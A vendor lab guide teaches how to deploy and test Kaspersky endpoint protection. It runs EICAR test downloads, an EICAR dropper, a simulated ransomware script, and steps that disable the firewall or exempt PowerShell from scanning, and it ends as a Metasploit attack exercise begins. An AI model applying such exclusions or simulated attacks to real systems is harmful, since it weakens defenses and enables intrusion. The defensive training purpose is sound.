Kaspersky Technical Training
Kaspersky Endpoint Security and Management
Lab Guide
KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1
Kaspersky Lab
www.kaspersky.com

Table of contents

Lab 1. How to install Kaspersky Security Center
  Task A: Install the Kaspersky Security Center Administration Server
  Task B: Install the Web console of Kaspersky Security Center
  Task C: Proceed through the Quick Start Wizard to configure Kaspersky Security Center Administration Server
Lab 2. How to deploy Kaspersky Endpoint Security
  Task A: Install Kaspersky Endpoint Security for Windows on a workstation and Kaspersky Security Center Administration Server
  Task B: Create a standalone installation package for Kaspersky Endpoint Security
  Task C: Install a standalone package of Kaspersky Endpoint Security for Windows on a notebook
  Task D: Study the results of deploying protection in the network
Lab 3. How to create a structure for the managed computers
  Task A: Create groups for workstations, notebooks, and servers
  Task B: Move computers into groups by rules
Lab 4. How to test File Threat Protection
  Make sure that Kaspersky Endpoint Security can detect malicious files that run within Windows Subsystem for Linux
Lab 5. How to configure Mail Threat Protection
  Task A: Send a message with an executable file
  Task B: Edit the attachment filter
  Task C: Make sure that Mail Threat Protection does not edit attachments anymore
Lab 6. How to test Web Threat Protection
  Task A: Make sure that Web Threat Protection scans https traffic by default
  Task B: Turn off encrypted traffic scanning for the PowerShell application
  Task C: Make sure that Web Threat Protection allows the trusted application PowerShell to download the test virus over https
Lab 7.
How to test protection of network folders against ransomware
  Task A: Simulate a ransomware infection
  Task B: Check how the Behavior Detection component reacted on the Tom-Laptop machine
  Task C: Allow encryption within network shared folders and configure exclusions for trusted network devices
  Task D: Make sure that exclusions for trusted network devices work correctly
Lab 8. How to check health of Exploit Prevention
  Task A: Simulate a hacker attack by exploiting a vulnerability in PowerShell and get access to a remote computer
  Task B: Disable most of the protection components
  Task C: Test protection against exploits
Lab 9. How to test protection against fileless threats
  Make sure that AMSI detects fileless threats
Lab 10. Improve workstations' protection against ransomware
  Task A: Simulate a ransomware infection
  Task B: Prohibit all programs except for trusted from editing and deleting documents
  Task C: Configure Host Intrusion Prevention events to be stored on the Administration Server
  Task D: Simulate encrypting a document and check the result
Lab 11. How to test Network Threat Protection
  Task A: Imitate a network attack from Kali on Alex-Desktop
  Task B: Study the Network attack report
  Task C: Unblock the Kali computer
  Task D: Configure exclusions in the properties of Network Threat Protection
  Task E: Imitate an attack from Kali on Alex-Desktop and study the results
Lab 12. How to configure exclusions from self-defense
  Task A: Try to interact with Kaspersky Endpoint Security via Windows Remote Assistance
  Task B: Allow Windows Remote Assistance to interact with Kaspersky Endpoint Security
  Task C: Open the local report of Kaspersky Endpoint Security in a Windows Remote Assistance session
Lab 13.
How to configure password protection
  Task A: Find a computer where protection is off
  Task B: Protect Kaspersky Endpoint Security with a password
  Task C: Make sure that Kaspersky Endpoint Security is password-protected
  Task D: Set a password for Network Agent uninstallation
Lab 14. How to configure Application Control
  Task A: Create a category for all web browsers except Internet Explorer
  Task B: Prohibit the users from starting any browsers except for Internet Explorer
  Task C: Start Mozilla Firefox and Internet Explorer
Lab 15. How to block start of unknown applications in the network
  Task A: Create an application category that prohibits starting unknown files
  Task B: Change the policy so as to prohibit all users from starting unknown files
  Task C: Make sure that the settings work correctly
Lab 16. How to block USB flash drives
  Task A: Configure blocking USB flash drives
  Task B: Test blocking USB flash drives
  Task C: Receive a request from the user
Lab 17. How to configure granular permissions for USB flash drives
  Task A: Prohibit all users from writing files to USB flash drives
  Task B: Allow domain users to write files to trusted USB flash drives
Lab 18. How to configure web access control
  Task A: Create a rule to block access to cryptocurrency exchange websites
  Task B: Test whether access to cryptocurrency exchange websites is blocked
  Task C: Consult reports in Kaspersky Security Center
Lab 19. How to configure Adaptive Anomaly Control
  Task A: Configure blocking macros and scripts in office documents
  Task B: Make sure that Adaptive Anomaly Control blocks a malicious macro
  Task C: Configure Exploit Prevention to block malicious macros
Lab 20.
How to configure the dashboard
  Task A: Add new widgets to the dashboard
  Task B: Delete and rearrange widgets
Lab 21. How to configure maintenance tools
  Task A: Delete unnecessary reports
  Task B: Create a weekly report about infected computers
  Task C: Configure the most important reports to be emailed
Lab 22. How to collect diagnostic information
  Task A: Collect trace logs from a computer

Lab 1. How to install Kaspersky Security Center

Scenario. You need to protect fewer than 100 computers at ABC Inc. with Kaspersky Endpoint Security for Business. One Administration Server and the Express edition of Microsoft SQL Server are enough to manage protection in a network of this size. Install Kaspersky Security Center Administration Server on a dedicated computer running Windows Server 2016. Microsoft SQL Server has been installed on the virtual machine beforehand.

Contents. In this lab, we will:
1. Install the Kaspersky Security Center Administration Server
2.
Install the Web console of Kaspersky Security Center
3. Proceed through the Quick Start Wizard to configure Kaspersky Security Center Administration Server

Task A: Install the Kaspersky Security Center Administration Server

Install Kaspersky Security Center Administration Server with the default settings.

The task is performed on Security-Center. The DC computer must be turned on.

1. Start the Kaspersky Security Center installer (it is on the desktop)
2. On the welcome page of the wizard, click Next
3. On the following page, make sure that the required version of .NET Framework is installed and click Next
4. Accept the License Agreement and the Privacy Policy
5. Click Next
6. Select the Standard installation type and click Next
7. Clear the Install Kaspersky Security Center 11 Web Console check box. We will install the Web Console later using its own installation wizard
8. Keep the option Fewer than 100 networked devices selected and click Next
9. Select Microsoft SQL Server and click Next
10. Click Browse
11. Select the SECURITY-CENTER\SQLEXPRESS server and click OK
12. To proceed with the installation of Kaspersky Security Center, click Next
13. Select Microsoft Windows Authentication Mode and click Next
14. To start the installation, click Install
15. Do not select to start the Administration Console; click Finish to close the wizard

Task B: Install the Web console of Kaspersky Security Center

Kaspersky Security Center 11 features a new management Web Console. It is implemented as an independent component with a separate distribution.

The task is performed on Security-Center. The DC computer must be turned on.

16.
Start the Kaspersky Security Center Web Console installer (ask the instructor where the distribution is located)
17. Select a language for the installation wizard
18. On the welcome page of the wizard, click Next
19. Accept the License Agreement and click Next
20. Do not change the destination folder
21. Click Next
22. Specify the connection address: 127.0.0.1
23. Do not change the port
24. Click Test
25. Make sure that port 8080 is accessible at 127.0.0.1
26. Click OK and Next
27. Leave these settings unchanged
28. Click Next
29. Select the option Generate new certificate
30. Click Next
31. Make sure that SECURITY-CENTER is specified in the list of trusted Administration Servers
32. Click Next to proceed with the installation
33. To start the installation, click Install
34. Close the Kaspersky Security Center 11 Web Console Setup Wizard: click Finish

Task C: Proceed through the Quick Start Wizard to configure Kaspersky Security Center Administration Server

Connect to the Administration Server using Kaspersky Security Center Web Console and proceed through the Quick Start Wizard. Add an activation code. Configure notifications to administrator@abc.lab via SMTP server 10.28.0.10. Accept the KSN agreement. Download signature updates. Do not start the Remote Installation Wizard. Enable automatic distribution for the license.

The task is performed on Security-Center. The DC, Alex-Desktop, and Tom-Laptop machines must be powered on.

35. Start the Google Chrome browser. In the address bar, type https://127.0.0.1:8080
36. Click Advanced
37. Click the link Proceed to 127.0.0.1 (unsafe). The browser warns because the Web Console presents the self-signed certificate generated in step 29; this is expected in the lab. Outside the lab, give the Web Console a certificate that client browsers already trust rather than teaching users to click through the warning
38.
Enter the username abc\administrator and password Ka5per5Ky
39. Click the Login button
40. Skip the tutorial: click X to close it
41. On the welcome page of the wizard, click Next
42. We will not use a proxy server. Click Next
43. Do not wait for the wizard to download updates; click Next
44. To activate the application, select Add activation code
45. Ask the trainer where to find the activation code
46. Enter the activation code in the field
47. Click Send
48. Make sure that 3 keys have been added to the repository
49. Click Next
50. Click Add to install the management plugin of Kaspersky Endpoint Security 11.1
51. Select the English KSC Web Console Plug-in for KES Windows
52. Click Install Plug-in
53. Make sure that the plugin of Kaspersky Endpoint Security 11.1 has been successfully added to the list
54. Click OK
55. Click Next
56. Accept the KSN statement: select I agree to use Kaspersky Security Network and click Next
57. Click Create
58. Wait for the Quick Start Wizard to create the initial policies and tasks
59. If the Network poll page appears, click Next
60. Specify the addressee for email notifications: in the Email address box, enter administrator@abc.lab, and for the SMTP server, type 10.28.0.10
61. Click the Send test message button to check whether the settings are correct
62. Make sure that there is no error message and click Next
63. Clear the Start Protection Deployment Wizard check box and click Finish
64. Switch to Operations | Licensing
65.
Select the key for workstations and servers
66. Click the license name to open the key properties
67. Select Deploy key automatically
68. Click Save

Conclusion

You installed the Administration Server, Kaspersky Security Center Web Console, and the plugin for Kaspersky Endpoint Security. You also completed the Quick Start Wizard: created the default tasks and policies, accepted the KSN agreement, configured notifications for the administrator, and enabled automatic distribution for the key. Further labs will teach you how to install Kaspersky Endpoint Security and Network Agent.

Lab 2. How to deploy Kaspersky Endpoint Security

Scenario. You need to install Kaspersky Endpoint Security on the network computers. You have already installed the Kaspersky Security Center Administration Server. Now, use the Remote Installation Wizard to install Kaspersky Endpoint Security and Network Agent on the computers discovered by the Administration Server.

Contents. In this lab, we will:
1. Install Kaspersky Endpoint Security for Windows on a workstation and Kaspersky Security Center Administration Server
2. Install Kaspersky Endpoint Security for Windows using a standalone package on a notebook
3. Study the installation results

Task A: Install Kaspersky Endpoint Security for Windows on a workstation and Kaspersky Security Center Administration Server

Run the Remote Installation Wizard and select the Kaspersky Endpoint Security package. To be able to access the computers, specify the domain administrator account ABC\Administrator and password Ka5per5Ky. Leave the other settings unchanged. Wait for the task to install the applications. If the task prompts you to restart a computer, act as a user and restart it.

The task is performed on Security-Center. The DC, Alex-Desktop, and Tom-Laptop machines must be powered on.

1. Switch to Discovery & Deployment
2.
On the Deployment & Assignment drop-down menu, select Protection Deployment Wizard
3. Select Kaspersky Endpoint Security for Windows (11.0.0) in the list of installation packages
4. Click Next
5. Select Do not add key to installation package
6. Click Next
7. Select Kaspersky Security Center 11 Network Agent
8. Click Next
9. Choose Select devices for installation
10. Expand the Managed devices list. Find and select the Security-Center computer
11. Expand the Unassigned devices list. Find and select the Alex-Desktop computer
12. Without changing the package copying parameters, click Next
13. Click Next without changing the restart parameters
14. Agree to uninstall incompatible applications and click Next
15. Select to move computers to the Managed devices group after the installation and click Next
16. To specify the name and password of an administrator, select Account required (installation without Network Agent)
17. To specify an account, click Add
18. Type the abc\administrator username and the Ka5per5Ky password, and click OK
19. Make sure that the abc\administrator account has been added and click Next
20. Select the Run the task when the Wizard completes check box
21. Click OK
22. Open the Devices | Tasks tab
23. Select the Remote installation of Kaspersky Endpoint Security for Windows task
24. To consult its progress, click Result
25. Make sure that the task is running on two computers
26. Wait for the notification that the computers have to be restarted to complete the task successfully
27. Switch to Alex-Desktop
28. Log on to the abc\Alex account, password Ka5per5Ky
29. Restart the computer: click the Restart button in the message window
30.
After it boots, log on to the abc\Alex account with the password Ka5per5Ky
31. To complete the Kaspersky Endpoint Security installation on the Security-Center server, restart the machine
32. When the computer starts again, log on to the abc\Administrator account with the password Ka5per5Ky

Task B: Create a standalone installation package for Kaspersky Endpoint Security

Open the list of installation packages. Select the Kaspersky Endpoint Security package. Start the standalone package creation wizard. Add the Network Agent to the installation package and select the group into which the target computers are to be moved after the installation.

The task is performed on Security-Center. The DC, Alex-Desktop, and Tom-Laptop machines must be powered on.

33. Log on to the abc\Administrator account with the password Ka5per5Ky
34. Run the MMC Administration Console
35. Expand the Advanced | Remote installation node
36. Select the Installation packages node
37. Select the installation package Kaspersky Endpoint Security for Windows (11.1.0)
38. In the right pane, click the Create stand-alone installation package link
39. Agree to install Kaspersky Security Center 11 Network Agent together with Kaspersky Endpoint Security: click Next
40. Agree to move protected computers to the Managed devices group: click Next
41. Wait for the wizard to create the package
42. Note the package file path; you will need it in the next task. Click Next
43. Click Finish to close the wizard

Task C: Install a standalone package of Kaspersky Endpoint Security for Windows on a notebook

From the client computer, open the KLSHARE folder on the Administration Server. Find and run the standalone package.

The task is performed on Tom-Laptop.
The DC, Security-Center, and Alex-Desktop machines must be powered on.

44. On the Tom-Laptop machine, start Windows Explorer
45. Open the shared folder \\security-center\klshare\PkgInst\
46. Open the folder of the standalone package that you created in the previous task
47. Copy the installer.exe file to the desktop and start it
48. In the User Account Control window, confirm running the file with administrative privileges: click Yes
49. Start the installation: click the respective button
50. Wait for the installation to complete and click Close to exit the results window

Task D: Study the results of deploying protection in the network

Study the results of the installation task. Make sure that the computers have been moved to the Managed devices group. Make sure that Network Agent 11 and Kaspersky Endpoint Security 11.1 are installed on the computers.

The task is performed on Security-Center. The DC, Alex-Desktop, and Tom-Laptop machines must be powered on.

51. Open Kaspersky Security Center Web Console
52. Switch to the Monitoring & Reporting | Reports tab
53. Find the Deployment reports
54. Select the Kaspersky Lab software version report
55. Click Show report
56. Make sure that it displays three instances of Kaspersky Endpoint Security and three instances of Network Agent, one for each computer on which protection was deployed (Security-Center, Alex-Desktop, and Tom-Laptop)
57. Close the report

Conclusion

You have installed Kaspersky Endpoint Security and Network Agent using the Remote Installation Wizard and a standalone package. If an antivirus by another manufacturer is installed on a computer, the installer uninstalls it and prompts to restart the machine.
If a firewall on the target computer blocks the connection, or you have not specified an account that has administrative permissions on the target machines, the installation returns an error.

Lab 3. How to create a structure for the managed computers

Scenario. You have installed protection on the network computers and want to configure it optimally. Assuming that servers, desktops, and laptops need different settings, create respective groups for them and move the computers there. To avoid moving computers into their groups by hand, create relocation rules with conditions based on the operating systems and network parameters of the computers.

Contents. In this lab, we will:
1. Create groups for workstations, notebooks, and servers
2. Move computers into the groups using rules

Task A: Create groups for workstations, notebooks, and servers

Create Servers and Workstations subgroups in the Managed devices container. Then create Desktops and Laptops subgroups within the Workstations group.

The task is performed on Security-Center. The DC, Alex-Desktop, and Tom-Laptop machines must be powered on.

1. Open the Devices | Edit groups tab
2. Select the Managed devices group
3. To create a subgroup, click Add
4. Type Servers for the group name and click Add
5. Select the Managed devices group
6. To create a subgroup, click Add
7. Create another subgroup named Workstations
8. Select the Workstations group and click Add
9. Type Desktops for the group name
10. Repeat steps 8 and 9 to create the Laptops group

Task B: Move computers into groups by rules

Open the list of rules in the properties of the Unassigned devices node. Create a rule for all computers. It will work permanently and move servers to the Servers group.
Use the Network Agent is running condition and the Operating system version condition with the Windows Server 2012 R2 and Windows Server 2016 values. You can find both conditions on the Applications tab. Create similar rules that move computers to the Desktops and Laptops groups respectively. Instead of the Operating system version, use the IP range condition available on the Network tab. For desktop computers, specify the range 10.28.0.100–10.28.0.199; for notebooks, 10.28.0.200–10.28.0.254.

The task is performed on Security-Center. The DC, Alex-Desktop, and Tom-Laptop machines must be powered on.

11. Switch to Discovery & Deployment
12. On the Deployment & Assignment drop-down menu, select Moving rules
13. Click Add
14. Type Servers for the rule name
15. Specify the destination group: on the drop-down list, select the Managed devices | Servers subgroup
16. Select the Rule applied continuously option
17. To apply the rule to all computers, clear the Move only devices that do not belong to an administration group check box. The computers already belong to the Managed devices group after Lab 2, so a rule limited to unassigned devices would never relocate them
18. Select the Enable rule check box
19. Open the Rule conditions tab
20. Switch to the Applications tab
21. Specify that the Network Agent is installed: on the respective drop-down list, select Yes
22. Apply the rule to computers with server operating systems: enable the Operating system version parameter
23. Scroll the list to the bottom and switch to the second page
24. Under Operating system version, select Microsoft Windows Server 2012 R2 and Microsoft Windows Server 2016
25. To save the rule, click Save
26. Click Add to create a rule for desktops
27. Type Desktops for the rule name
28. Specify the destination group: on the drop-down list, select the Managed devices | Workstations | Desktops subgroup
29.
Select the Rule applied continuously option
30. To apply the rule to all computers, clear the Move only devices that do not belong to an administration group check box
31. Select the Enable rule check box
32. Open the Rule conditions tab
33. Configure conditions for IP addresses: switch to the Network tab
34. Apply the rule to computers whose addresses belong to a specific interval: select the IP range check box
35. Specify the IP range 10.28.0.100–10.28.0.199
36. Switch to the Applications tab
37. Specify that the Network Agent is installed: on the respective drop-down list, select Yes
38. To save the rule, click Save
39. Click Add to create a rule for notebooks
40. Type Laptops for the rule name
41. Specify the destination group: on the drop-down list, select the Managed devices | Workstations | Laptops subgroup
42. Select the Rule applied continuously option
43. Clear the Move only devices that do not belong to an administration group check box
44. Select the Enable rule check box
45. Open the Rule conditions tab
46. Switch to the Network tab
47. Select the IP range check box
48. Specify the IP range 10.28.0.200–10.28.0.254
49. Switch to the Applications tab
50. Specify that the Network Agent is installed: on the respective drop-down list, select Yes
51. To save the rule, click Save
52. Make sure that there are five relocation rules in the list: two were created automatically for installation packages, and three by you
53. Click Devices | Managed devices
54. Click Devices | Groups
55. (Optional) Pin the group structure
56. In the group structure tree, expand Security Center | Managed devices and select Servers
57. Open the properties of the Security-Center device
58.
Make sure that the Security-Center computer, which is running Windows Server 2016 operating system, has been automatically moved to the Servers group 59. In a similar manner, make sure that the other computers have been moved to their respective groups Conclusion You installed protection and organized the computers into groups. The default settings are optimized for an average user of Kaspersky Endpoint Security. They reliably protect computers, and minimize the performance impact. You can adjust the protection-comfort balance as necessary: Reinforce protection in some aspects, and maybe make concessions in some others aiming to improve the user experience. Further labs will explain how to fine-tune the protection settings. Lab 4. How to test File Threat Protection Scenario. You installed Kaspersky Endpoint Security on the network computers. By default, Kaspersky Endpoint Security supports Windows Subsystem for Linux: It is a compatibility layer for running Linux applications in the latest versions of Microsoft Windows. In our environment, Windows Subsystem for Linux is based on Ubuntu Linux 14.04. The administrator is to start a test malicious file in Windows Subsystem for Linux and make sure that Kaspersky Endpoint Security 11.1 detects and deletes it. Contents. In this lab, we will: 1. Make sure that Kaspersky Endpoint Security can detect malicious files that run within Windows Subsystem for Linux 2. Consult the File Threat Protection events Make sure that Kaspersky Endpoint Security can detect malicious files that run within Windows Subsystem for Linux In this task, we will try to compile a loader for eicar.com within Windows Subsystem for Linux that is running under Windows 10. L–35 Lab 4. How to test File Threat Protection The task is performed on Tom-Laptop. The DC and Security-Center machines must be powered on. 1. Press WIN+R 2. Type wsl 3. Click OK 4. Copy the eicar dropper’s source code to the /tmp: folder cp /mnt/c/temp/eicar_drop_kl_edu.cpp /tmp/ 5. 
Go to the /tmp: directory cd /tmp/ 6. Compile the eicar dropper using the g++ compiler: g++ eicar_drop_kl_edu.cpp -o eicar_dropper 7. Run the compiled eicar dropper: ./eicar_dropper 8. Click Kaspersky Endpoint Security icon in the notification area or on the Start menu to open Kaspersky Endpoint Security interface 9. Click Reports in the lower-left corner L–36 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 10. Select the File Threat Protection report 11. Find the threat detection event 12. Find the results of processing this threat Conclusion This lab demonstrates how Kaspersky Endpoint Security can detect malicious files that are saved or created within Windows Subsystem for Linux. Lab 5. How to configure Mail Threat Protection Scenario. Your network computers are protected with Kaspersky Endpoint Security. When an administrator emails an executable file to a user who is to run it and thus solve an issue, Kaspersky Endpoint Security renames the attachment. To save time and avoid explaining the users how to rename them back, configure Mail Threat Protection not to rename files. At the same time, criminals often use files with double extension to trick users into running a malicious executable disguised as a document. Contents. In this lab, configure Mail Threat Protection not to rename attached *.exe files, but rename files with double extension *.pdf.exe. 1. Send a message with an executable file 2. Edit the attachment filter 3. Make sure that Mail Threat Protection does not edit attachments anymore Task A: Send a message with an executable file Send a message to tom@abc.lab with a zipped *.pdf.exe file attached. Receive the message and make sure that Mail Threat Protection has changed the extension of the archived file. mailto:tom@abc.lab L–37 Lab 5. How to configure Mail Threat Protection The task is performed on Alex-Desktop. The DC and Security-Center machines must be powered on. 1. Begin the task on Alex-Desktop. 
2. Create a new message: — Specify the addressee. In the To: field, type Tom@abc.lab — In the Subject: box, type Weekly report — Attach the Document1.zip file to the message (ask the trainer where it is located) 3. Click Send to dispatch the message Switch to Tom-Laptop 4. Run Microsoft Outlook. Select the received message 5. Save the Document1.zip file to the desktop 6. Unpack the Document1.zip archive (select the Extract all command on the file’s shortcut menu) 7. Note that the archived file is named Document1.pdf.ex_. Mail Threat Protection has changed the extension of the archived executable file Task B: Edit the attachment filter In Kaspersky Endpoint Security policy, edit the list of attachment formats that Mail Threat Protection deletes. L–38 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 The task is performed on Security-Center. The DC, Alex-Desktop, and Tom-Laptop machines must be powered on. 8. Open Kaspersky Security Center Web Console 9. Go to Devices | Policies & Profiles 10. Open the policy Kaspersky Endpoint Security for Windows (11.1.0) 11. Switch to the Application Settings tab 12. Open the Essential Threat Protection section 13. Open the Mail Threat Protection settings 14. Reconfigure attachment filtering. Choose Delete attachments of selected types L–39 Lab 5. How to configure Mail Threat Protection 15. Scroll the list of settings down 16. Disable processing *.exe 17. Create a new attachment filter: Click Add 18. In the Extension field, type *.pdf.exe 19. Click OK 20. Make sure that the *.pdf.exe attachment filter is displayed in the list 21. Click OK 22. Click Save to save the policy 23. Wait for the policy to be enforced Task C: Make sure that Mail Threat Protection does not edit attachments anymore L–40 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 The task is performed on Alex-Desktop. 
The DC, Security-Center, and Tom-Laptop machines must be powered on. 24. On the Alex-Desktop machine, create another message. Attach the Procmon.zip file (ask the instructor where this file is located) 25. In the Subject: box, type IT Service Desk 26. Click Send Switch to Tom-Laptop 27. Open Microsoft Outlook 28. Save the Procmon.zip file to the desktop 29. Unpack the Procmon.zip archive (select the Extract all command on the file’s shortcut menu) 30. Note that in the new message, the archived file is named Procmon.exe; Mail Threat Protection has not renamed it Conclusion You have configured Mail Threat Protection not to rename .exe files. If the network is being attacked through email by a new virus that has not yet been added to either signature database or KSN, configure Mail Threat Protection to rename or delete all executable attachments. L–41 Lab 6. How to test Web Threat Protection Lab 6. How to test Web Threat Protection Scenario. Kaspersky Endpoint Security can scan https traffic under the default settings. It replaces the certificate for this purpose, which sometimes may affect banking and other software that uses a certificate of its own. To avoid interaction issues, Kaspersky Endpoint Security permits excluding encrypted traffic from scanning. Contents. In this lab, we will: 1. Make sure that Web Threat Protection scans https traffic under the default settings 2. Turn off encrypted traffic scanning for the PowerShell application 3. Make sure that Web Threat Protection allows the trusted application PowerShell to download the test virus over https Task A: Make sure that Web Threat Protection scans https traffic by default Run PowerShell, try to download the eicar_com.zip file, and check how Kaspersky Endpoint Security will react. The task is performed on Tom-Laptop. The DC and Security-Center machines must be powered on. 1. Press WIN+R 2. Type powershell 3. Click OK 4. Download the eicar_com.zip file via PowerShell over https. 
Carry out the following command: Invoke-WebRequest –uri “https://secure.eicar.org/eicar_com.zip” -OutFile “C:\temp\eicar_com.zip” 5. Make sure that Kaspersky Endpoint Security has blocked the download. Do not close the PowerShell window Task B: Turn off encrypted traffic scanning for the PowerShell application Add PowerShell to the list of trusted applications, try to download the eicar_com.zip file, and check how Kaspersky Endpoint Security will react. https://secure.eicar.org/eicar_com.zip L–42 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 The task is performed on Security-Center. The DC and Tom-Laptop machines must be powered on. 6. Open Kaspersky Security Center Web Console 7. Go to Devices | Policies & Profiles 8. Open the policy Kaspersky Endpoint Security for Windows (11.1.0) 9. Switch to the Application Settings tab 10. Open the General Settings section 11. Open Exclusions 12. To add a trusted application, click the link Trusted applications in the lower-left corner of the window 13. Click Add L–43 Lab 6. How to test Web Threat Protection 14. For the application path, type %systemroot%\system32\ WindowsPowershell\v1.0\ powershell.exe 15. Clear the following checkboxes: Do not scan opened files Do not inherit restrictions of the parent process (application) 16. Select Do not scan network traffic | Encrypted traffic only 17. Click OK three times to save the exclusion 18. Click Save to save the policy 19. Confirm that you want to use the specified settings: Click Yes 20. Wait for the policy to be enforced Task C: Make sure that Web Threat Protection allows the trusted application PowerShell to download the test virus over https Download the eicar_com.zip file from the www.eicar.org website through the PowerShell application once again. Make sure that Web Threat Protection will not block the test virus if it is downloaded via a trusted application. The task is performed on Tom-Laptop. 
The machines DC and Security-Center must be powered on. 21. Download eicar_com.zip over the https secure protocol one more time. Carry out the following command: Invoke-WebRequest –uri https://secure.eicar.org/eicar_com.zip -OutFile “C:\temp\eicar_com.zip” http://www.eicar.org/ https://secure.eicar.org/eicar_com.zip L–44 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 22. To make sure that the file has been saved successfully, open the C:\temp\ directory 23. Close the PowerShell window Conclusion This lab demonstrates how to add an application to the trust list and prevent scanning its encrypted traffic. The option Do not scan network traffic configured for trusted programs applies to the Mail Threat Protection, Web Threat Protection, and Web Control components, and does not influence the Firewall or Network Threat Protection. Lab 7. How to test protection of network folders against ransomware Scenario. Your network computers are protected with Kaspersky Endpoint Security and managed via Kaspersky Security Center. Of all threats, you are most concerned about ransomware that encrypts data in shared folders. If Kaspersky Endpoint Security fails to detect a new malware version one day, the company will lose much money. You want to use the Behavior Detection protection component to counter ransomware. Contents. In this lab, we will: 1. Simulate a ransomware infection 2. Check how the Behavior Detection protection component reacted 3. Allow encryption within network shared folders and configure exclusions for network devices 4. Make sure that exclusions for network devices work correctly Task A: Simulate a ransomware infection Find the ransomware2.bat script on the desktop of the Alex-Desktop computer and run it. It imitates ransomware: Encrypts files in shared network folders and deletes the originals. 
Make sure that Kaspersky Endpoint Security 11.1 restored the invoice.txt file and the Alex user cannot modify files in the network shared folder anymore. L–45 Lab 7. How to test protection of network folders against ransomware The task is performed on Security-Center. The DC, Alex-Desktop, and Tom-Laptop machines must be powered on. 1. Open Kaspersky Security Center Web Console 2. Go to Devices | Policies & Profiles 3. Open the policy Kaspersky Endpoint Security for Windows (11.1.0) 4. Switch to the Application Settings tab 5. In Advanced Threat Protection, select Host Intrusion Prevention 6. Disable Host Intrusion Prevention 7. Click OK L–46 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 8. In Essential Threat Protection, select Firewall 9. Disable the Firewall 10. Click OK 11. Save the settings: Click Save 12. Confirm that you want to use the specified settings: Click Yes 13. Wait for the policy to be enforced 14. !Restart the Tom- Laptop computer Switch to the Alex-Desktop machine. L–47 Lab 7. How to test protection of network folders against ransomware 15. Open the shared folder \\tom-laptop\temp 16. Make sure that the invoice.txt file is there 17. Find the ransomware2.bat file on the desktop. It imitates actions of file encrypting ransomware 18. Run the ransomware2.bat file 19. Consult the contents of the folder \\tom- laptop\temp 20. Open the invoice.txt.aes file in Notepad 21. Make sure that the invoice.txt.aes file is encrypted 22. Close Notepad 23. Refresh the contents of the folder \\tom- laptop\temp 24. Make sure that the invoice.txt file has been recreated Sometimes, the original file is not deleted because Behavior Detection blocks the remote connection as soon as detects remote encryption, before the script deletes the original file. 25. Try to delete the encrypted file 26. 
Make sure that access is denied file://///tom-laptop/temp file://///tom-laptop/temp file://///tom-laptop/temp L–48 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 Task B: Check how the Behavior Detection component reacted on the Tom- Laptop machine Consult the report of the Behavior Detection protection component on Tom-Laptop. Note the actions that the protection component performed. The task is performed on Tom-Laptop. The DC, Security-Center, and Alex-Desktop machines must be powered on. 27. Log on to the abc\Tom account, password Ka5per5Ky 28. Open Kaspersky Endpoint Security interface 29. Open the application reports 30. Select Behavior Detection 31. Make sure that the malicious encryption activity attempted from IP 10.28.0.100 was blocked 32. Make sure that the C:\temp\invoice.txt file was restored L–49 Lab 7. How to test protection of network folders against ransomware Task C: Allow encryption within network shared folders and configure exclusions for trusted network devices In some cases, Behavior Detection may consider operations performed by design engineering applications as crypto- ransomware activities. To prevent false positives, we recommend that you add computers to trusted. Select the Administration Server and edit the Kaspersky Endpoint Security policy. Add the IP address of the Alex-Desktop computer to the list of exclusions of the Behavior Detection component. The task is performed on Security-Center. The DC, Alex-Desktop, and Tom-Laptop machines must be powered on. 33. Open Kaspersky Security Center Web Console 34. Go to Devices | Policies & Profiles 35. Open the policy Kaspersky Endpoint Security for Windows (11.1.0) 36. Switch to the Application Settings tab 37. In Advanced Threat Protection, select Behavior Detection 38. Reconfigure protection of shared folders against external encryption: Switch the action from Block connection to Inform 39. 
To create an exclusion, click Add L–50 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 40. Create an exclusion. Type the IP address of the Alex-Desktop workstation (10.28.0.100) 41. Click OK twice 42. Save the changes to the policy Task D: Make sure that exclusions for trusted network devices work correctly The task is performed on Alex-Desktop. The DC, Security-Center, and Tom-Laptop machines must be powered on. 43. On the Alex-Desktop machine, log off and on again 44. Open the folder \\tom-laptop\temp\ 45. Delete the file invoice.txt.aes 46. Find the ransomware2.bat file on the desktop 47. Run the ransomware2.bat file 48. Make sure that the invoice.txt file has been encrypted and the original invoice.txt file has not been restored 49. Delete the file invoice.txt.aes 50. Make sure that the file has been deleted correctly Conclusion In this lab, we demonstrated that Kaspersky Endpoint Security can detect malicious ransomware activity with the default settings. The Behavior Detection component takes care of that. If necessary, the administrator can always specify exclusions for the protection component and allow specific network devices to encrypt files in shared folders. file://///tom-laptop/temp L–51 Lab 8. How to check health of Exploit Prevention Lab 8. How to check health of Exploit Prevention Scenario. Criminals can exploit vulnerabilities much easier than one would imagine. With such a powerful tool as Metasploit Framework, a criminal can create an exploit and send it to unsuspecting company employees. Contents. In this lab, we will: 1. Simulate a hacker attack by exploiting a vulnerability in PowerShell and get access to a remote computer 2. Enable protection against exploits Task A: Simulate a hacker attack by exploiting a vulnerability in PowerShell and get access to a remote computer On the Kali computer, run the Metasploit Framework penetration utility. Attack HTA (HTML Application) via PowerShell. 
